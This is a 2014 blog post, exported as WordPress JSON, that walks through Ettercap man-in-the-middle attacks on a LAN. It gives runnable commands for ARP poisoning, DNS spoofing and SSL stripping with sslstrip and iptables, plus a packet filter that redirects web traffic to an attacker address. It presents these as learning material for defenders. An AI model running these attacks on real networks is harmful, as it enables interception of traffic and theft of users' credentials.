{"id":528,"date":"2014-01-14T19:39:25","date_gmt":"2014-01-15T02:39:25","guid":{"rendered":"http:\/\/somethingk.com\/main\/?p=528"},"modified":"2014-01-14T19:39:25","modified_gmt":"2014-01-15T02:39:25","slug":"ettercap-man-in-the-middle-fun","status":"publish","type":"post","link":"https:\/\/somethingk.com\/main\/ettercap-man-in-the-middle-fun\/","title":{"rendered":"Ettercap Man-in-the-Middle Fun!"},"content":{"rendered":"<p>Ethernet is a broadcast system. Messages sent over Ethernet from any one computer are broadcast, allowing other computers on the network to view and potentially intercept information. This vulnerability is what allows hackers to sniff packets and perform Man-in-the-Middle attacks (an attack where a hacker manipulates packets between their source and destination). What&#8217;s worse is that companies spend a lot of effort to keep hackers out but not as much to prevent hacking from within a network. These <a title=\"Link Layer\" href=\"http:\/\/en.wikipedia.org\/wiki\/Link_layer\" target=\"_blank\">link layer<\/a> attacks are especially dangerous because of the lack of firewalls within a network.<\/p>\n<p>One type of attack is known as ARP poisoning. <a title=\"Address Resolution Protocol\" href=\"http:\/\/en.wikipedia.org\/wiki\/Address_Resolution_Protocol\" target=\"_blank\">ARP<\/a> relies on the fact that requests for IP-to-MAC address resolution are broadcast. In simplified terms, the resolution process consists of a device on the network looking for the machine that owns a given address. It broadcasts ARP packets asking, who has this specific IP? The machine with that IP then responds, I do. A hacker can broadcast its own ARP packets and poison the ARP caches of every device in the LAN, lying about its address and re-routing traffic. ARP has no authentication at all, which is what allows this attack to succeed. 
The attacker can also reply to an ARP request before the legitimate machine does.<\/p>\n<p>Other attacks\/vulnerabilities performed on the link layer that take advantage of broadcasts include:<\/p>\n<ul>\n<li>CAM Table Exhaustion<\/li>\n<li>ARP Spoofing<\/li>\n<li>DHCP Starvation<\/li>\n<\/ul>\n<p><a title=\"Ettercap Home Page\" href=\"http:\/\/ettercap.github.io\/ettercap\/\" target=\"_blank\">Ettercap<\/a> is an open-source tool used to perform man-in-the-middle attacks on a local area network. It intercepts packets passing between the user and the gateway node and can change their content. I&#8217;ll go over just a few examples of the awesome crap it can do.<\/p>\n<p>I do NOT advocate using this information maliciously; it&#8217;s important to learn the attacks in order to protect against them!<\/p>\n<p><span style=\"text-decoration: underline;\"><strong>ARP Sniffing<\/strong><\/span><\/p>\n<p>This attack monitors traffic. Hackers can \u2018sniff\u2019 or view incoming packets using this ettercap function. 
The screenshot below shows the ARP requests created when ettercap starts up.<\/p>\n<p><b>Execution Command:<\/b><\/p>\n<pre>ettercap -TqM arp:remote \/&lt;Target IP Range&gt;\/ \/&lt;Gateway IP Range&gt;\/<\/pre>\n<a href=\"http:\/\/somethingk.com\/main\/wp-content\/uploads\/2014\/01\/arp.png\"><img fetchpriority=\"high\" decoding=\"async\" class=\"aligncenter size-full wp-image-534\" alt=\"Arp\" src=\"http:\/\/somethingk.com\/main\/wp-content\/uploads\/2014\/01\/arp.png\" width=\"1053\" height=\"197\" srcset=\"https:\/\/somethingk.com\/main\/wp-content\/uploads\/2014\/01\/arp.png 1053w, https:\/\/somethingk.com\/main\/wp-content\/uploads\/2014\/01\/arp-300x56.png 300w, https:\/\/somethingk.com\/main\/wp-content\/uploads\/2014\/01\/arp-1024x191.png 1024w\" sizes=\"(max-width: 1053px) 100vw, 1053px\" \/><\/a>\n<p><span style=\"text-decoration: underline;\"><strong>DNS Hijacking<\/strong><\/span><\/p>\n<p>This attack diverts a machine to an IP address other than the one its DNS lookup should return. Basically, the attack focuses on placing a false entry into a computer\u2019s DNS cache, causing a domain name to map to an incorrect IP address. DNS hijacking exploits the lack of authentication in DNS: if the requesting system does not validate responses, an incorrect entry can be inserted.<\/p>\n<p>First a device makes a request for a specific domain name entered by the user, asking the DNS server for the resolved IP of that name. With the attack, the attacker answers instead of the DNS server. The requesting device then caches the IP provided by the attacker for the name the user asked for. 
So instead of going to Google.com, one can divert traffic to hack.com.<\/p>\n<p><b>Edit Configuration File:<\/b><\/p>\n<ul>\n<li>Command:<\/li>\n<\/ul>\n<p><span style=\"font-family: Consolas, Monaco, monospace; font-size: 12px; line-height: 18px;\">vim \/usr\/local\/share\/ettercap\/etter.dns (Location in Backtrack 5 R2)<\/span><\/p>\n<ul>\n<li>Add entry:<\/li>\n<\/ul>\n<p><span style=\"font-family: Consolas, Monaco, monospace; font-size: 12px; line-height: 18px;\">&lt;DNS&gt; A &lt;Directed IP&gt;<\/span><\/p>\n<p><b>Execution Command: <\/b><\/p>\n<pre>ettercap -TqP dns_spoof -M arp:remote \/&lt;Gateway IP Range&gt;\/ \/&lt;Target IP Range&gt;\/<\/pre>\n<p><span style=\"text-decoration: underline;\"><strong>SSL MitM<\/strong><\/span><\/p>\n<p>This attack intercepts SSL packets: instead of credentials being passed safely to a host, they are sent in clear text to the attacker. This is especially villainous.<\/p>\n<p><b>Change the ettercap configuration file:<\/b><\/p>\n<ul>\n<li>Change:<\/li>\n<\/ul>\n<pre>ec_uid = 0                 # nobody is the default\r\nec_gid = 0                 # nobody is the default<\/pre>\n<ul>\n<li>Uncomment the lines under \"# if you use iptables\":<\/li>\n<\/ul>\n<pre>redir_command_on = \"iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport\"\r\nredir_command_off = \"iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport\"<\/pre>\n<p><b>Execution Commands:<\/b><\/p>\n<ul>\n<li>Redirect requests on port 80:<\/li>\n<\/ul>\n<p><span style=\"font-family: Consolas, Monaco, monospace; font-size: 12px; line-height: 18px;\">sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 
10000<\/span><\/p>\n<ul>\n<li>Verify entry in table:<\/li>\n<\/ul>\n<p><span style=\"font-family: Consolas, Monaco, monospace; font-size: 12px; line-height: 18px;\">sudo iptables --list -t nat<\/span><\/p>\n<ul>\n<li>Enable forwarding:<\/li>\n<\/ul>\n<p><span style=\"font-family: Consolas, Monaco, monospace; font-size: 12px; line-height: 18px;\">echo 1 | sudo tee \/proc\/sys\/net\/ipv4\/ip_forward<\/span><\/p>\n<ul>\n<li>Run Ettercap:<\/li>\n<\/ul>\n<p><span style=\"font-family: Consolas, Monaco, monospace; font-size: 12px; line-height: 18px;\">ettercap -TqM arp \/&lt;Gateway IP Range&gt;\/ \/&lt;Target IP Range&gt;\/<\/span><\/p>\n<ul>\n<li>Run sslstrip to strip SSL and hide the certificate:<\/li>\n<\/ul>\n<p><span style=\"font-family: Consolas, Monaco, monospace; font-size: 12px; line-height: 18px;\">python \/pentest\/web\/sslstrip\/sslstrip.py -a -k -f<\/span><\/p>\n<figure id=\"attachment_533\" aria-describedby=\"caption-attachment-533\" style=\"width: 300px\" class=\"wp-caption aligncenter\"><a href=\"http:\/\/somethingk.com\/main\/wp-content\/uploads\/2014\/01\/Untitled.png\"><img decoding=\"async\" class=\"size-medium wp-image-533\" alt=\"I got you Facebook user\" src=\"http:\/\/somethingk.com\/main\/wp-content\/uploads\/2014\/01\/Untitled-300x18.png\" width=\"300\" height=\"18\" srcset=\"https:\/\/somethingk.com\/main\/wp-content\/uploads\/2014\/01\/Untitled-300x18.png 300w, https:\/\/somethingk.com\/main\/wp-content\/uploads\/2014\/01\/Untitled.png 885w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><figcaption id=\"caption-attachment-533\" class=\"wp-caption-text\">I got you Facebook user<\/figcaption><\/figure>\n<p><span style=\"text-decoration: underline;\"><strong>Filters<\/strong><\/span><\/p>\n<p>Filters can be created to manipulate packets to perform a desired function. The filter below monitors all packets and, if it finds TCP traffic on port 80, manipulates the data. 
The first part of the filter replaces the Accept-Encoding header so the server responds in uncompressed plaintext. The second part of the filter then reports that the requested page has moved and diverts the user to a new destination page. The example below diverts all web requests to 192.168.200.201. ARP poisoning can only be performed on the local network.<\/p>\n<p><b>Filter Script<\/b><\/p>\n<pre>if (ip.proto == TCP &amp;&amp; tcp.dst == 80) {\r\n    if (search(DATA.data, \"Accept-Encoding\")) {\r\n        replace(\"Accept-Encoding\", \"Accept-Rubbish!\");\r\n        msg(\"Zapped!\");\r\n    }\r\n}\r\nif (ip.proto == TCP &amp;&amp; tcp.src == 80) {\r\n    replace(\"200 OK\", \"301 Moved Permanently\r\nLocation: http:\/\/192.168.200.201\/\r\n\");\r\n    msg(\"redirect success\\n\");\r\n}<\/pre>\n<p><b>Command to compile filter: <\/b><\/p>\n<pre>etterfilter &lt;Filter Text&gt; -o &lt;Compiled Filter&gt;<\/pre>\n<p><b>Execution Command:<\/b><\/p>\n<pre>ettercap -Tq -F &lt;Filter&gt; -M arp:remote \/&lt;Target IP Range&gt;\/ \/&lt;Gateway IP Range&gt;\/<\/pre>\n<a href=\"http:\/\/somethingk.com\/main\/wp-content\/uploads\/2014\/01\/filter.png\"><img decoding=\"async\" class=\"aligncenter size-medium wp-image-536\" alt=\"filter\" src=\"http:\/\/somethingk.com\/main\/wp-content\/uploads\/2014\/01\/filter-300x209.png\" width=\"300\" height=\"209\" srcset=\"https:\/\/somethingk.com\/main\/wp-content\/uploads\/2014\/01\/filter-300x209.png 300w, https:\/\/somethingk.com\/main\/wp-content\/uploads\/2014\/01\/filter.png 957w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a>\n","protected":false},"excerpt":{"rendered":"<p>Ethernet is a broadcast system. 
Messages sent over Ethernet from any one computer are broadcast, allowing other computers on the network to view and potentially intercept information. This vulnerability is what allows hackers to sniff packets and perform Man-in-the-Middle attacks (an attack where a hacker manipulates packets between their source and destination). What&#8217;s worse is that companies spend a lot [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[21,43,37,36,24],"tags":[124,127,123,125,126],"class_list":["post-528","post","type-post","status-publish","format-standard","hentry","category-backtrack","category-exploit","category-kali","category-network-capture","category-penetration-testing","tag-arp","tag-dns-hijacking","tag-ettercap","tag-poisoning","tag-sniffing"],"_links":{"self":[{"href":"https:\/\/somethingk.com\/main\/wp-json\/wp\/v2\/posts\/528","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/somethingk.com\/main\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/somethingk.com\/main\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/somethingk.com\/main\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/somethingk.com\/main\/wp-json\/wp\/v2\/comments?post=528"}],"version-history":[{"count":12,"href":"https:\/\/somethingk.com\/main\/wp-json\/wp\/v2\/posts\/528\/revisions"}],"predecessor-version":[{"id":544,"href":"https:\/\/somethingk.com\/main\/wp-json\/wp\/v2\/posts\/528\/revisions\/544"}],"wp:attachment":[{"href":"https:\/\/somethingk.com\/main\/wp-json\/wp\/v2\/media?parent=528"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/somethingk.com\/main\/wp-json\/wp\/v2\/categories?post=528"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/somethingk.com\/main\/wp-json\/wp\/v2\/tags?post=528"}],"curies":[{"name":"wp","href"
:"https:\/\/api.w.org\/{rel}","templated":true}]}}